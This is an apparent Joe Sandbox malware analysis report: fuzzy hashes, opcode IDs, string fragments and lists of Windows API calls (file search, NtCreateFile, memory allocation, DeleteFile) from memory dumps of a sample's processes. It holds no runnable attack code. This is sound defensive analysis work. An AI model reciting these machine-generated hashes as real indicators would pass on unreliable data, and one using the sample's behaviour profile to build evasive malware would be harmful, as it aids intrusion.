                                  • Instruction ID: de0a009fca5f0c30eadf8973b8b30e5b4952a340c0dd69b2a851ecbad78862ab
                                  • Opcode Fuzzy Hash: 636ea438d664245b2df1dbabcf74092c1610cba3c9aaa36eae25e07fc8a6632e
                                  • Instruction Fuzzy Hash: A901EDB6C0121DAF8B41EFE9D9409EEBBF8AF08200F14816ED519F7200F77056048FA5
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 048150da0851b6014c6761df76cc55df8a0567aa93a067310f03b6a1c90c017a
                                  • Instruction ID: bd975118444b1d510ee1a75c36de640bd8264a3045e830eec907cf4348c8f136
                                  • Opcode Fuzzy Hash: 048150da0851b6014c6761df76cc55df8a0567aa93a067310f03b6a1c90c017a
                                  • Instruction Fuzzy Hash: B3F0AE775102166BD710DB9DAC45B87FBDCEB45234F140122F91C97241D671D45187A0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea97bbaa504d2fd1a7a75a578015d1f83677b2ad14c3c5f0c0792d3583a52944
                                  • Instruction ID: 40cc41c734701a1b5a5f8f3d81547ed1755f728664ab8027e130d66e567bd42a
                                  • Opcode Fuzzy Hash: ea97bbaa504d2fd1a7a75a578015d1f83677b2ad14c3c5f0c0792d3583a52944
                                  • Instruction Fuzzy Hash: 9DF0F8762002087BDB50DE99DC85EDB77ADEF88650F004509BE189B241DA70B9618BB4
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction ID: c37c0eaaeb80d826349a77d3ee13c6c3f287f78ed7bdf7e24d5938801ccfb7b4
                                  • Opcode Fuzzy Hash: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction Fuzzy Hash: 1EE06DBA2003087FD610EF58DC44EDB73ADEF85710F000008FD08A7241D770B9208AB4
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 863d5771b3a32ee36451c4eaf0aeb48629d6fa879c2ff1f69770082ff01008b5
                                  • Instruction ID: d3045dfc41439278a90d8e5a48d737cd30966c52ea1eb49d42633cc9e3801c2e
                                  • Opcode Fuzzy Hash: 863d5771b3a32ee36451c4eaf0aeb48629d6fa879c2ff1f69770082ff01008b5
                                  • Instruction Fuzzy Hash: 34E020775142177BC7149BEE5C80983FFDDEA862303250321F55C9B251D531D45183E4
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88393d9b702a7e0893a0b3db55156c558a155649ec1ca7ab9ad45c238d5557a6
                                  • Instruction ID: 8a166e109ef84b1e387454b2a248f3731e7dfc4a22da86de25c0d979a86fe7e3
                                  • Opcode Fuzzy Hash: 88393d9b702a7e0893a0b3db55156c558a155649ec1ca7ab9ad45c238d5557a6
                                  • Instruction Fuzzy Hash: 44F01275815209EBDB24DF68D841BDDBBB8EB04320F2043A9E8259B2C0D63597549785
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b01c90a70936b189f150aaefc9213e80cd1d92a6939f0f6270465fb773a0867f
                                  • Instruction ID: 78dbb735c4e3f1bbe6c85e6e466ade6fefcc719ff4bccc6c57ec04c87c996c3c
                                  • Opcode Fuzzy Hash: b01c90a70936b189f150aaefc9213e80cd1d92a6939f0f6270465fb773a0867f
                                  • Instruction Fuzzy Hash: D8E04F3760135827D324A69D9C09F9BB79C9BC5A60F198065FE08AB344E961E91042E5
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f17eb6d8425b444866fdd1b64cdf760659ae07f8411573838ee669ef71ede161
                                  • Instruction ID: cccb3dad9c77cd48187be76442ecd7b0d29e537943b15e6fbe01da50dbca88ac
                                  • Opcode Fuzzy Hash: f17eb6d8425b444866fdd1b64cdf760659ae07f8411573838ee669ef71ede161
                                  • Instruction Fuzzy Hash: 8BE09B75815108DBEB04DF64D841BDDBBB5DB04320F244369F828DB2C0D6399750D740
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction ID: 41c4a69477a429486479e7fa025f2a1c4d0f18e3e69b2038d7dfe877f91f3fd6
                                  • Opcode Fuzzy Hash: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction Fuzzy Hash: 42E0463A2003087BD620EA6DDC41EDB776EEFC5A54F004519FA08AB281C671B92186F0
                                  • Opcode Fuzzy Hash: a4c8c626b49c9416086979bef8ffe998c552bd1fe46c14c2384f7cc478796446
                                  • Instruction Fuzzy Hash: EF8188B6C11318AAEB15EB94CD55FEFB37CEF48600F0041DDE509AA180EB749B948FA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: 84219f62106f740b3efb70774f9656afcd4841226ee15e45f2b871136f746158
                                  • Instruction ID: 419bf7313e660fe0e197e6efbe1239848aeb74284b58bd0dabc8e94dececc30b
                                  • Opcode Fuzzy Hash: 84219f62106f740b3efb70774f9656afcd4841226ee15e45f2b871136f746158
                                  • Instruction Fuzzy Hash: 896150B6900304AFDB24DBA4CC94FEFB7FCEB49710F144558E519A7280E735AA55CBA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: aa38f8aa0f8a8433130b31793d0127ad2343df1938fac59de76e0f7290e58e63
                                  • Instruction ID: b58e9bef55a9ec799e3ea822c263edcf5e61f1c576948332321737317b742100
                                  • Opcode Fuzzy Hash: aa38f8aa0f8a8433130b31793d0127ad2343df1938fac59de76e0f7290e58e63
                                  • Instruction Fuzzy Hash: E541F9B5A00308AFDB20DFA4CC94BEFBBF9EB49704F104559E519AB280D775AA458B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$h$o$A9Z
                                  • API String ID: 0-2823261680
                                  • Opcode ID: 8073f8db20c38680884c64937b7ec14348025e7d37683932a60b1e708fbb0118
                                  • Instruction ID: c7059a7821ec015d11eac504583f3c1a8b6a503ad76f0a013d32d89bcf5de1ad
                                  • Opcode Fuzzy Hash: 8073f8db20c38680884c64937b7ec14348025e7d37683932a60b1e708fbb0118
                                  • Instruction Fuzzy Hash: 044184B6D01318AAEB14EFA4CD54FDFB379AF08700F0041DDA509AA180EB745B948FA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2$6$7$B$Q
                                  • API String ID: 0-1857536651
                                  • Opcode ID: 823051863333396e472862e700179fb64f35d6e43c2ef82e076fbab20e45a9dd
                                  • Instruction ID: 76c600113d4fecf8a75d035f1459fc7b5d458c93d65667792dacf43d35c7b748
                                  • Opcode Fuzzy Hash: 823051863333396e472862e700179fb64f35d6e43c2ef82e076fbab20e45a9dd
                                  • Instruction Fuzzy Hash: 9D3166B6911219BBDB10DFA4CD45FEF77BCEF44304F004188E904AB241E775AA158BE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &$@$T$r$|
                                  • API String ID: 0-2936373407
                                  • Opcode ID: 52b834935e16f86e24be3f63f00b82829789106f15dc9b3570ab1c075fda1b2c
                                  • Instruction ID: 3b9a1b0fdef70ec0453bf060b55d40d722a1702ac61597201fdc9318fe4144c2
                                  • Opcode Fuzzy Hash: 52b834935e16f86e24be3f63f00b82829789106f15dc9b3570ab1c075fda1b2c
                                  • Instruction Fuzzy Hash: 5E11C920D087CEDADB12C6BC84086AEBF715F23224F0883D9D5E52B2D2D2795706D7A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: c06b0bbbf0f0ac409cdb68b6c717e785402c6fd4fbcd9262218775041f353502
                                  • Instruction ID: bf165e991e51673c0003298969bd2c85d95c54bbdb9ae1af649af27f02578bf4
                                  • Opcode Fuzzy Hash: c06b0bbbf0f0ac409cdb68b6c717e785402c6fd4fbcd9262218775041f353502
                                  • Instruction Fuzzy Hash: 96B11CB5A00308AFDB24DBA4CC84FEFB7FDAF88710F148558F65997284D675AA41CB60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 6354a86ce7c55dedb1c0a3f959fa7e8616980a11b3a83cd96a6846db4cb6c54e
                                  • Instruction ID: e3fd8290e9d876185167b0d499d94dfe07573ce5c803963a21f05b5fc5adf12f
                                  • Opcode Fuzzy Hash: 6354a86ce7c55dedb1c0a3f959fa7e8616980a11b3a83cd96a6846db4cb6c54e
                                  • Instruction Fuzzy Hash: 4B610E75A04308AFDB24DFA4CC84FEFB7FDAF88700F244558E6599B284D775AA418B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                  • API String ID: 0-2877786613
                                  • Opcode ID: 63d2eb0e3249d1c6dd8d0ca2881b2442c2c3f3bc9dc3679fc2f1479db113e48d
                                  • Instruction ID: b621f86176dad21f6c800cfad8cc828b5bf3e9416fd54b7d94d7caea176b3e96
                                  • Opcode Fuzzy Hash: 63d2eb0e3249d1c6dd8d0ca2881b2442c2c3f3bc9dc3679fc2f1479db113e48d
                                  • Instruction Fuzzy Hash: 1341BE76941288BBEB15EB94CC45FEF777C9F49600F104448FA00BF180EBB06A1187B6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                  • API String ID: 0-2877786613
                                  • Opcode ID: b9a3f6f4810d2dc56e353225c014313bd2a8ececf4940fd5aaa9647a88d9ea9f
                                  • Instruction ID: 1c9d005008cf7c2cce3575c540e28a988b45f8376f01e0ed2bafc6827064c9cd
                                  • Opcode Fuzzy Hash: b9a3f6f4810d2dc56e353225c014313bd2a8ececf4940fd5aaa9647a88d9ea9f
                                  • Instruction Fuzzy Hash: D541AF76951298BAEB15EB94CC45FEF777C9F49700F104049FA00BF180D7B56A1187B6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 38fb880483433567aeeac27345e518c91e355d7381beb93b08449d7e009cdd7c
                                  • Instruction ID: 1c455a5179ba9172a2634994f6982f9f80445640bdd7060bcf2425069d6df581
                                  • Opcode Fuzzy Hash: 38fb880483433567aeeac27345e518c91e355d7381beb93b08449d7e009cdd7c
                                  • Instruction Fuzzy Hash: D911ADB6900308EFDB14DF98D884ADEBBB9FF08314F048259E919AF205E771D954CBA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: a1a7c1d068b8f31ef7901ff97af7a7792dca12bbdf6e42c4c39a1ffa440d1abd
                                  • Instruction ID: 66de3b8891fa5629567851af71007aac8aeecbfefe000562134018c7e7af0b53
                                  • Opcode Fuzzy Hash: a1a7c1d068b8f31ef7901ff97af7a7792dca12bbdf6e42c4c39a1ffa440d1abd
                                  • Instruction Fuzzy Hash: 2901ADB2900308ABDB14DF98D884ADEB7B9FF08314F048209E919AB205E771E944CBA0

                                  Execution Graph

                                  Execution Coverage:2.5%
                                  Dynamic/Decrypted Code Coverage:4.2%
                                  Signature Coverage:2.2%
                                  Total number of Nodes:450
                                  Total number of Limit Nodes:70

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #T$)5$:d$<I$Av$UD$Zw$\+$^$^0$pK$s${v$!$G$y
                                  • API String ID: 0-3981489472
                                  • Opcode ID: d8376ba10eb9f3f954921727ff61b9c8ba2be121acb82a82e81e66235ba5c8e1
                                  • Instruction ID: e9d85812eaa1de5fc52c0f5be393ace220ce19c36c9db9997dbffedb5b4b2c93
                                  • Opcode Fuzzy Hash: d8376ba10eb9f3f954921727ff61b9c8ba2be121acb82a82e81e66235ba5c8e1
                                  • Instruction Fuzzy Hash: 4202BEB0D15229CBEB24CF55C894BADBBB2BF44308F1081DAD019BB281C7B95AC8CF55
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0327C0E1
                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0327C11E
                                  • FindClose.KERNELBASE(?), ref: 0327C129
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 9a1c2824b1e3f800d5f83cf8e8f0986494d0a4b2d236afc5e89e7297cec4511a
                                  • Instruction ID: f2d3f33d7866e17bb98a54fd6d743334c201a08f25ce49efd49ff6d2a71893d5
                                  • Opcode Fuzzy Hash: 9a1c2824b1e3f800d5f83cf8e8f0986494d0a4b2d236afc5e89e7297cec4511a
                                  • Instruction Fuzzy Hash: B031A5759103197BEB20EB70CC85FFB777CAF45744F144568B908AB180DAB4AAD58BA0
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,9198DE90,?,?,?,?), ref: 03288AC5
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 4b2e54c8ebf7852719f1cd43975ab956a7cdb15fb99e5427df7e6aba1e8585d4
                                  • Instruction ID: 8a730d71f02dc939002a939968bd1fc11071b4bd4f26a38f976cb4836e915767
                                  • Opcode Fuzzy Hash: 4b2e54c8ebf7852719f1cd43975ab956a7cdb15fb99e5427df7e6aba1e8585d4
                                  • Instruction Fuzzy Hash: 5731CAB5A11248AFCB14DF98D880EDFB7B9EF8C310F504119F919A7384D770A851CBA4
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,9198DE90,?,?), ref: 03288C10
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 42ac1a8bb9e7a59628d2a5915d7a7a3e9bd4519dd71691ffc4517caf9c3131b0
                                  • Instruction ID: efc56d65244a14a576ee9f031ef1c940cf3ccdef1077c6c04d5404155578b5c1
                                  • Opcode Fuzzy Hash: 42ac1a8bb9e7a59628d2a5915d7a7a3e9bd4519dd71691ffc4517caf9c3131b0
                                  • Instruction Fuzzy Hash: 7731E6B5A01208AFDB14DF99D881EEFB7B9EF88314F108119FD19A7384D770A851CBA4
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(0327183E,?,0328795F,00000000,00000004,00003000,?,?,?,?,?,0328795F,0327183E,?,?,0328AD01), ref: 03288EE2
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 3353034ddccea7c1ad3847ada8403a4cf7963ddca2c4795e90b3f183136f83fd
                                  • Instruction ID: 97f9d798e9c8ff8669a4c3ad8071f106589d67ee827a0d78395f9d365922a33a
                                  • Opcode Fuzzy Hash: 3353034ddccea7c1ad3847ada8403a4cf7963ddca2c4795e90b3f183136f83fd
                                  • Instruction Fuzzy Hash: 6A214BB5A10209AFDB10EF98CC41EEFB7B9EF88310F104109FD18AB284D770A851CBA5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: da6f4e58d67c94b322fb787d705f8d761771db53247e21b67dec9d70db62689c
                                  • Instruction ID: b288d0082125f16afa98a22a7af1e183d543973198e7e7e770a5fa0418a8c189
                                  • Opcode Fuzzy Hash: da6f4e58d67c94b322fb787d705f8d761771db53247e21b67dec9d70db62689c
                                  • Instruction Fuzzy Hash: 6D11CE31A112046BD620EBA8CC41FEFB3ACDF84310F008549FA08AB284D7B17991C7A1
                                  APIs
                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03288CF7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction ID: 2f6e0a5a43e8ac8ce91d9c5e321f1a20ec3143363a5f809e087c119fb3bc07ff
                                  • Opcode Fuzzy Hash: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction Fuzzy Hash: B2E0463A2103047BD220EA69DC01FDB776DDFC5624F408419FA08AB281C7B1B95186F0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9981ee1fab8cfa0c42fc417f26e03ae33acaa3ec8e4ac4906847c9d0c537c614
                                  • Instruction ID: 8d6f4ea335dbdc58372420b17669fdc9825416412bd3af37fdd0f59a94875b6d
                                  • Opcode Fuzzy Hash: 9981ee1fab8cfa0c42fc417f26e03ae33acaa3ec8e4ac4906847c9d0c537c614
                                  • Instruction Fuzzy Hash: 91900271605804129140B1584C84546400D97F0301B56C012E4424554C8B188A565371
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: abd5154f60375b49eda202d200dd0bf880dacdf2907b42c5537c0cf45d66c577
                                  • Instruction ID: e6cbe27b2856a5eecee771b65259748264f21a8153189eb7f9e0a5a149c9e7bc
                                  • Opcode Fuzzy Hash: abd5154f60375b49eda202d200dd0bf880dacdf2907b42c5537c0cf45d66c577
                                  • Instruction Fuzzy Hash: 859002A1601504424140B1584C04406600D97F1301396C116A4554560C871C89559279
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: df9b1439b8267d8072b828d65d5b6964e156b791b16188e227f7c43878f62259
                                  • Instruction ID: b9c396e0e71d7bdc3eae94fb6449d56db541295db5d826bca9440ebb9de914d3
                                  • Opcode Fuzzy Hash: df9b1439b8267d8072b828d65d5b6964e156b791b16188e227f7c43878f62259
                                  • Instruction Fuzzy Hash: F090027160540C02D150B1584814746000D87E0301F56C012A4024654D87598B5576B1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 99225a67788f5c1abebb45b31693800b8fd54ceedb9262691be15081833ddd45
                                  • Instruction ID: 87aa88c2bd7278d8596735e8cc4e0e5b5ccd72685a2694a391de1b2836a2ed04
                                  • Opcode Fuzzy Hash: 99225a67788f5c1abebb45b31693800b8fd54ceedb9262691be15081833ddd45
                                  • Instruction Fuzzy Hash: 9990027120544C42D140B1584804A46001D87E0305F56C012A4064694D97298E55B671
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 80616616de8978aadfc28515fe06c941d72cd827d5ef0ed8cbd2f160f86a9100
                                  • Instruction ID: 57a3d13c9625596cb978ab5207fc5888dadc733692f43ed983bd740528c2df26
                                  • Opcode Fuzzy Hash: 80616616de8978aadfc28515fe06c941d72cd827d5ef0ed8cbd2f160f86a9100
